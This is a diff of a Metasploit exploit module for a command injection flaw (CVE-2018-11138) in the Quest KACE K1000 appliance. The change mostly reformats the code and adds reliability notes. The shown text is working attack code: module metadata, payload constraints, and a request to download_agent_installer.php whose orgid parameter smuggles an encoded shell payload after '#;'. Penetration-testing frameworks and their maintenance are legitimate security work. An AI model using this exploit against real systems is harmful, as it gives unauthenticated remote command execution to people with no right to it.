@@ -10,58 +10,64 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Quest KACE Systems Management Command Injection',
-      'Description'    => %q{
-        This module exploits a command injection vulnerability in Quest KACE
-        Systems Management Appliance version 8.0.318 (and possibly prior).
+    super(
+      update_info(
+        info,
+        'Name' => 'Quest KACE Systems Management Command Injection',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in Quest KACE
+          Systems Management Appliance version 8.0.318 (and possibly prior).
 
-        The `download_agent_installer.php` file allows unauthenticated users
-        to execute arbitrary commands as the web server user `www`.
+          The `download_agent_installer.php` file allows unauthenticated users
+          to execute arbitrary commands as the web server user `www`.
 
-        A valid Organization ID is required. The default value is `1`.
+          A valid Organization ID is required. The default value is `1`.
 
-        A valid Windows agent version number must also be provided. If file
-        sharing is enabled, the agent versions are available within the
-        `\\kace.local\client\agent_provisioning\windows_platform` Samba share.
-        Additionally, various agent versions are listed on the KACE website.
+          A valid Windows agent version number must also be provided. If file
+          sharing is enabled, the agent versions are available within the
+          `\kace.local\client\agent_provisioning\windows_platform` Samba share.
+          Additionally, various agent versions are listed on the KACE website.
 
-        This module has been tested successfully on Quest KACE Systems
-        Management Appliance K1000 version 8.0 (Build 8.0.318).
-      },
-      'License'        => MSF_LICENSE,
-      'Privileged'     => false,
-      'Platform'       => 'unix', # FreeBSD
-      'Arch'           => ARCH_CMD,
-      'DisclosureDate' => '2018-05-31',
-      'Author'         =>
-        [
+          This module has been tested successfully on Quest KACE Systems
+          Management Appliance K1000 version 8.0 (Build 8.0.318).
+        },
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Platform' => 'unix', # FreeBSD
+        'Arch' => ARCH_CMD,
+        'DisclosureDate' => '2018-05-31',
+        'Author' => [
           'Leandro Barragan', # Discovery and PoC
-          'Guido Leo',        # Discovery and PoC
-          'bcoles',    # Metasploit
+          'Guido Leo', # Discovery and PoC
+          'bcoles', # Metasploit
         ],
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2018-11138'],
           ['URL', 'http://web.archive.org/web/20210508161500/https://support.quest.com/product-notification/noti-00000134'],
           ['URL', 'https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities']
         ],
-      'Payload'        =>
-        {
-          'Space'       => 1024,
-          'BadChars'    => "\x00\x27",
+        'Payload' => {
+          'Space' => 1024,
+          'BadChars' => "\x00\x27",
           'DisableNops' => true,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl'
-            }
+          'Compat' =>
+                        {
+                          'PayloadType' => 'cmd',
+                          'RequiredCmd' => 'generic perl'
+                        }
         },
-      'Targets'        => [['Automatic', {}]],
-      'DefaultTarget'  => 0))
+        'Targets' => [['Automatic', {}]],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
     register_options [
-      OptString.new('SERIAL',        [false, 'Serial number', '']),
-      OptString.new('ORGANIZATION',  [true, 'Organization ID', '1']),
+      OptString.new('SERIAL', [false, 'Serial number', '']),
+      OptString.new('ORGANIZATION', [true, 'Organization ID', '1']),
       OptString.new('AGENT_VERSION', [true, 'Windows agent version', '8.0.152'])
     ]
   end
@@ -125,13 +131,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vars_get = Hash[{
       'platform' => 'windows',
-      'serv'     => Digest::SHA256.hexdigest(serial),
-      'orgid'    => "#{datastore['ORGANIZATION']}#; #{payload.encoded} ",
-      'version'  => datastore['AGENT_VERSION']
+      'serv' => Digest::SHA256.hexdigest(serial),
+      'orgid' => "#{datastore['ORGANIZATION']}#; #{payload.encoded} ",
+      'version' => datastore['AGENT_VERSION']
     }.to_a.shuffle]
 
     res = send_request_cgi({
-      'uri'      => normalize_uri('common', 'download_agent_installer.php'),
+      'uri' => normalize_uri('common', 'download_agent_installer.php'),
       'vars_get' => vars_get
     }, 10)
 
